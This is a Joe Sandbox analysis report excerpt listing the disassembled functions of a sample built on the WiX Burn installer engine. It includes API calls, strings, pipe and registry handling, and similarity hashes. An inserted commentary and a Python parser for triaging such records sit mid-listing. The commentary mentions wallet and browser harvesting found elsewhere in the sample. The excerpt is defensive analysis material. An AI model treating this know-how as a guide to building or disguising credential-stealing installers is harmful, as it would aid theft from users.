                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00808307
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0080844B
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                              • API String ID: 1825529933-3037633208
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007DE2AF: LoadBitmapW.USER32(?,00000001), ref: 007DE2E5
                                                                                                                                                                • Part of subcall function 007DE2AF: GetLastError.KERNEL32 ref: 007DE2F1
                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 007DE429
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 007DE43D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE448
                                                                                                                                                              • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 007DE54D
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007DE55C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                              • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                                                              • API String ID: 164797020-2188509422
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,007EBC85,00000001), ref: 007E9E46
                                                                                                                                                              • GetLastError.KERNEL32(?,007EBC85,00000001), ref: 007E9FB6
                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000001,00000000,?,007EBC85,00000001), ref: 007E9FF6
                                                                                                                                                              • GetLastError.KERNEL32(?,007EBC85,00000001), ref: 007EA000
                                                                                                                                                              Strings
                                                                                                                                                              • Cache thread exited unexpectedly., xrefs: 007EA047
                                                                                                                                                              • Failed to wait for cache check-point., xrefs: 007E9FE7
                                                                                                                                                              • Failed to execute MSP package., xrefs: 007E9ECB
                                                                                                                                                              • Failed to execute compatible package action., xrefs: 007E9F73
                                                                                                                                                              • Invalid execute action., xrefs: 007EA056
                                                                                                                                                              • Failed to execute dependency action., xrefs: 007E9F36
                                                                                                                                                              • Failed to execute MSU package., xrefs: 007E9EFB
                                                                                                                                                              • Failed to execute EXE package., xrefs: 007E9E7D
                                                                                                                                                              • Failed to execute MSI package., xrefs: 007E9EA6
                                                                                                                                                              • Failed to execute package provider registration action., xrefs: 007E9F17
                                                                                                                                                              • apply.cpp, xrefs: 007E9FDD, 007EA027
                                                                                                                                                              • Failed to get cache thread exit code., xrefs: 007EA031
                                                                                                                                                              • Failed to load compatible package on per-machine package., xrefs: 007E9F5C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                              • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                                                              • API String ID: 3703294532-2662572847
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00803AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00803B3E
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00810D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 007CF440
                                                                                                                                                                • Part of subcall function 008014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,007CF28D,00810D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008014BB
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseValueVersion
                                                                                                                                                              • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                                                                                                                              • API String ID: 2348918689-2631711097
                                                                                                                                                              • Opcode ID: b2a45924617a076cb77a57cd1e423567db6570542bf74c90cfe34e7c93c373c8
                                                                                                                                                              • Instruction ID: 537e0bb1cf1a33f160bbd0509c3ebbfe0932fc06a6c3f7a5a634b0e5562f13fd
                                                                                                                                                              • Opcode Fuzzy Hash: b2a45924617a076cb77a57cd1e423567db6570542bf74c90cfe34e7c93c373c8
                                                                                                                                                              • Instruction Fuzzy Hash: FB51B331941666FADF259AA48C0AFAEB76AFF00720F11013DF910F6290D77C9A909AD1
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 007ECC9D
                                                                                                                                                                • Part of subcall function 007D4D8D: UuidCreate.RPCRT4(?), ref: 007D4DC0
                                                                                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,007E2401,?,?,00000000,?,?,?), ref: 007ECD7B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 007ECD85
                                                                                                                                                              • GetProcessId.KERNEL32(007E2401,?,?,00000000,?,?,?,?), ref: 007ECDBD
                                                                                                                                                                • Part of subcall function 007D54DC: lstrlenW.KERNEL32(?,?,00000000,?,0080B500,?,00000000,?,007C452F,?,0080B500), ref: 007D54FD
                                                                                                                                                                • Part of subcall function 007D54DC: GetCurrentProcessId.KERNEL32(?,007C452F,?,0080B500), ref: 007D5508
                                                                                                                                                                • Part of subcall function 007D54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,007C452F,?,0080B500), ref: 007D553F
                                                                                                                                                                • Part of subcall function 007D54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,007C452F,?,0080B500), ref: 007D5554
                                                                                                                                                                • Part of subcall function 007D54DC: GetLastError.KERNEL32(?,007C452F,?,0080B500), ref: 007D555E
                                                                                                                                                                • Part of subcall function 007D54DC: Sleep.KERNEL32(00000064,?,007C452F,?,0080B500), ref: 007D5593
                                                                                                                                                                • Part of subcall function 007D54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55B6
                                                                                                                                                                • Part of subcall function 007D54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55D1
                                                                                                                                                                • Part of subcall function 007D54DC: WriteFile.KERNEL32(?,/E|,0080B500,00000000,00000000,?,007C452F,?,0080B500), ref: 007D55EC
                                                                                                                                                                • Part of subcall function 007D54DC: WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,007C452F,?,0080B500), ref: 007D5607
                                                                                                                                                                • Part of subcall function 00800A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00800A38
                                                                                                                                                                • Part of subcall function 00800A28: GetLastError.KERNEL32(?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800A46
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECE41
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECE50
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?), ref: 007ECE67
                                                                                                                                                              Strings
                                                                                                                                                              • embedded.cpp, xrefs: 007ECDA6
                                                                                                                                                              • Failed to process messages from embedded message., xrefs: 007ECE04
                                                                                                                                                              • Failed to wait for embedded process to connect to pipe., xrefs: 007ECDDF
                                                                                                                                                              • Failed to wait for embedded executable: %ls, xrefs: 007ECE24
                                                                                                                                                              • Failed to allocate embedded command., xrefs: 007ECD54
                                                                                                                                                              • %ls -%ls %ls %ls %u, xrefs: 007ECD40
                                                                                                                                                              • Failed to create embedded pipe., xrefs: 007ECD27
                                                                                                                                                              • Failed to create embedded process at path: %ls, xrefs: 007ECDB3
                                                                                                                                                              • Failed to create embedded pipe name and client token., xrefs: 007ECD00
                                                                                                                                                              • burn.embedded, xrefs: 007ECD38
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                                              • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                              • API String ID: 875070380-3803182736
                                                                                                                                                              • Opcode ID: 971acae5923df8c24942ff04c685dc10f9a5cebb17ea757a33a488caef5a9f1f
                                                                                                                                                              • Instruction ID: e84b2e552b78c2bb33a9fa6e37b657d5068399ede07786eb3d050256e99c6a54
                                                                                                                                                              • Opcode Fuzzy Hash: 971acae5923df8c24942ff04c685dc10f9a5cebb17ea757a33a488caef5a9f1f
                                                                                                                                                              • Instruction Fuzzy Hash: 8E517C76E41269FBDF12DA94DC06BDEBBB9EB08710F100122FA00F6291D7799A419BD1
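Each record above is one recovered function: its API calls (subcall lines indented under the call that reaches them), the strings it references with their xrefs, the memory dump it was lifted from, and the Similarity identifiers (API ID, String ID, Opcode ID, fuzzy hashes). Two caveats for triage. First, the strings in these records (burn.embedded, burn.runonce, registration.cpp, embedded.cpp, pipe.cpp, apuputil.cpp) are characteristic of the WiX Burn bootstrapper engine, whose normal operation includes starting a child copy of itself with a "-burn.embedded" style command line and talking to it over a named pipe; this block therefore documents installer plumbing, and the sample's verdict rests on the other signatures in the report (the wallet and browser harvesting, the foreign-memory writes), not on these functions alone. Second, the records are only useful at scale if they are machine-readable. The following Python parser is an added example for this page, not Joe Sandbox's code and not part of the report: it turns records in the layout shown above into structured objects and flags the child-process-over-pipe shape. The sample input is a trimmed excerpt of two records from this page; the dataclass names and the heuristic are this example's own.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity blocks) into objects for scripted triage. Added example; the record
layout follows the report text, the class names and heuristic are ours."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Headings that delimit the sub-blocks of one function record.
SECTION_NAMES = {"APIs", "Strings", "Memory Dump Source",
                 "Joe Sandbox IDA Plugin", "Similarity"}

# One API line: optional "Part of subcall function XXXX: " prefix, then
# Name.MODULE, optional "(args)", then "ref: ADDR". The comma before "ref"
# is absent when there is no argument list ("GetLastError.KERNEL32 ref: ...").
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_.\-]+?)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: str               # argument list as printed, "" when absent
    ref: str                # call-site address
    parent: Optional[str]   # subcall function address, None for direct calls


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # [ApiCall, ...]
    strings: list = field(default_factory=list)     # [(string, xref), ...]
    sources: list = field(default_factory=list)     # dump / snapshot lines
    similarity: dict = field(default_factory=dict)  # "Opcode ID" -> value ...


def parse_report(text: str) -> list:
    """Split report text into FunctionRecords; a record starts at each 'APIs'."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_NAMES:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current.apis.append(ApiCall(m["api"], m["module"],
                                            m["args"] or "", m["ref"], m["parent"]))
        elif section == "Strings":
            s, sep, xref = body.rpartition(", xrefs: ")
            if not sep:                      # string printed without an xref
                s, xref = body, ""
            current.strings.append((s, xref))
        elif section == "Similarity":
            key, _, value = body.partition(": ")
            current.similarity[key] = value
        else:
            current.sources.append(body)
    return records


def api_names(rec: FunctionRecord) -> set:
    """API names reached by the function, direct calls and subcalls alike."""
    return {c.api for c in rec.apis}


def string_ids(rec: FunctionRecord) -> list:
    """The '$'-separated String ID field as individual strings."""
    value = rec.similarity.get("String ID", "")
    return value.split("$") if value else []


def launches_child_over_pipe(rec: FunctionRecord) -> bool:
    """Heuristic (ours, not a report field): CreateProcessW together with
    named-pipe connect/write calls, i.e. the parent side of the shape above."""
    names = api_names(rec)
    return "CreateProcessW" in names and bool(
        names & {"ConnectNamedPipe", "SetNamedPipeHandleState", "WriteFile"})


# Trimmed excerpt of two records from this page (constructed test input).
SAMPLE = r"""
APIs
• GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 007ECC9D
  • Part of subcall function 007D4D8D: UuidCreate.RPCRT4(?), ref: 007D4DC0
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,007E2401,?,?,00000000,?,?,?), ref: 007ECD7B
  • Part of subcall function 007D54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,007C452F,?,0080B500), ref: 007D5554
• CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,007ECBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 007ECE41
Strings
• embedded.cpp, xrefs: 007ECDA6
• %ls -%ls %ls %ls %u, xrefs: 007ECD40
• burn.embedded, xrefs: 007ECD38
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Similarity
• API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
• String ID: %ls -%ls %ls %ls %u$burn.embedded$embedded.cpp
• Opcode ID: 971acae5923df8c24942ff04c685dc10f9a5cebb17ea757a33a488caef5a9f1f
• Instruction Fuzzy Hash: 8E517C76E41269FBDF12DA94DC06BDEBBB9EB08710F100122FA00F6291D7799A419BD1
APIs
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 007D4B84
• GetLastError.KERNEL32 ref: 007D4B92
• Sleep.KERNEL32(00000064), ref: 007D4BB6
Strings
Similarity
• API ID: CreateErrorFileLastSleep
• String ID: Failed to open parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
• Opcode ID: 088054d47b899eb3b569ed53304b0cf2b0a1fa8e7ae463def39fa16148513fc0
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.similarity.get("Opcode ID", "?")[:16],
              sorted(api_names(rec)), launches_child_over_pipe(rec))
```

Pasting the whole function listing of a report into `parse_report` gives one record per function; grouping the results by the `API String ID` or `Opcode ID` values, or diffing the `Instruction Fuzzy Hash` fields against a known-good Burn engine build, is then a few lines of ordinary Python rather than a scroll through the page.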
APIs
• SysFreeString.OLEAUT32(?), ref: 007CEE4C
  • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
  • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
• SysFreeString.OLEAUT32(?), ref: 007CEE04
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: FreeHeapString$AllocateProcess
• String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
• API String ID: 336948655-956346883
• Opcode ID: 098c8601a3a73e7de0d81d644c3e21906cde8808b710200f2c0302a66057fc98
• Instruction ID: 531c54a926f0d825383bcf2552bb66d18047439b9fcad175ebe32c4fd4de5905
• Opcode Fuzzy Hash: 098c8601a3a73e7de0d81d644c3e21906cde8808b710200f2c0302a66057fc98
• Instruction Fuzzy Hash: 1A518035A0162AEBDB21DB98C895FAEBBA8FF00B50B10416DF911EB240C778DE409790
APIs
• CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,00808468,00000001,?), ref: 00807F9E
• CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00808468,00000001,?), ref: 00807FB9
• CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00808468,00000001,?), ref: 00807FD4
• CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00808468,00000001,?), ref: 00808040
• CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00808468,00000001,?), ref: 00808064
• CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00808468,00000001,?), ref: 00808088
• CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00808468,00000001,?), ref: 008080A8
• lstrlenW.KERNEL32(006C0064,?,00808468,00000001,?), ref: 008080C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CompareString$lstrlen
• String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
• API String ID: 1657112622-2492263259
• Opcode ID: eff5c35366c9a2986b97b18ba4809cf44046b9e19b17e6760355c73678ec7fd0
• Instruction ID: 328ab227b29b5b095f26d55035379c3f818557e6cdcd6435daec750e4a9a8a20
• Opcode Fuzzy Hash: eff5c35366c9a2986b97b18ba4809cf44046b9e19b17e6760355c73678ec7fd0
• Instruction Fuzzy Hash: A8518131648622FBDB605E54DC46F167A62FB15B30F208314F674EA2D1DBB5E8908B90
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 007CA0B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Open@16
• String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
• API String ID: 3613110473-2134270738
• Opcode ID: 678fe0fe28bb6698749b8119d98d7baaaaa648b983f689517cd7b533016506df
• Instruction ID: 4bc59d947c96af604ed35ffc9fdbb7dd75e79768bbf8ecd2101f33f58605f766
• Opcode Fuzzy Hash: 678fe0fe28bb6698749b8119d98d7baaaaa648b983f689517cd7b533016506df
• Instruction Fuzzy Hash: E761C432D4012CBBCB119AA8CD49F9E7B78FB45319F14016DF914FA291D63BDE409B92
APIs
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 007D4B84
• GetLastError.KERNEL32 ref: 007D4B92
• Sleep.KERNEL32(00000064), ref: 007D4BB6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CreateErrorFileLastSleep
• String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
• API String ID: 408151869-3212458075
• Opcode ID: 088054d47b899eb3b569ed53304b0cf2b0a1fa8e7ae463def39fa16148513fc0
• Instruction ID: fb73979d5ef5e720fc5a73ea6deb2d286f71133da7bacf0c509d87eaa6865c4b
• Opcode Fuzzy Hash: 088054d47b899eb3b569ed53304b0cf2b0a1fa8e7ae463def39fa16148513fc0
                                                                                                                                                              • Instruction Fuzzy Hash: FB41F376992632BBDB3156A0CD06F5A7AB8BF10720F110223FE14BA390D77D9D409AE4
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,007E6F28,?), ref: 007E6A0B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6A18
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6A60
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6A6C
                                                                                                                                                              • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6AA6
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007E6F28,?,?,?), ref: 007E6AB0
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 007E6B67
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 007E6B71
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                                              • String ID: (o~$Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                              • API String ID: 971853308-587502988
                                                                                                                                                              • Opcode ID: 88e5f013cf3c6cb153a6ad073bd5e4f852cb4409927eccd6220a8e5d31370642
                                                                                                                                                              • Instruction ID: 3a5069a708a6ae49f471ae73ddfccf556cdf582ff0782397f10a69b278ec91e2
                                                                                                                                                              • Opcode Fuzzy Hash: 88e5f013cf3c6cb153a6ad073bd5e4f852cb4409927eccd6220a8e5d31370642
                                                                                                                                                              • Instruction Fuzzy Hash: 0D41B5B2E427659BD7219AA68C45FAFBBA8EF18760F118035FD11FB241D778DC0086A0
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,007D04DF,InstallerVersion,InstallerVersion,00000000,007D04DF,InstallerName,InstallerName,00000000,007D04DF,Date,InstalledDate,00000000,007D04DF,LogonUser), ref: 007CF733
                                                                                                                                                                • Part of subcall function 008014F4: RegSetValueExW.ADVAPI32(00020006,00810D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF335,00000000,?,00020006), ref: 00801527
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseValue
                                                                                                                                                              • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                              • API String ID: 3132538880-2703781546
                                                                                                                                                              • Opcode ID: b3201b5dde9c716661e171785838c3f348e685519e57a85937381864775ff699
                                                                                                                                                              • Instruction ID: e4528ed43deb96099bfbe7c1e587ebe89ae26cb11e7e996d6fff6baa74b9d827
                                                                                                                                                              • Opcode Fuzzy Hash: b3201b5dde9c716661e171785838c3f348e685519e57a85937381864775ff699
                                                                                                                                                              • Instruction Fuzzy Hash: BA418671A40A65F6CF2296548C06FEF7B6AFF10B20F15016CF910F63A1C7699E60A685
                                                                                                                                                              APIs
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?), ref: 007DE7FF
                                                                                                                                                              • RegisterClassW.USER32(?), ref: 007DE82B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE836
                                                                                                                                                              • CreateWindowExW.USER32(00000080,00819E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 007DE89D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DE8A7
                                                                                                                                                              • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 007DE945
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
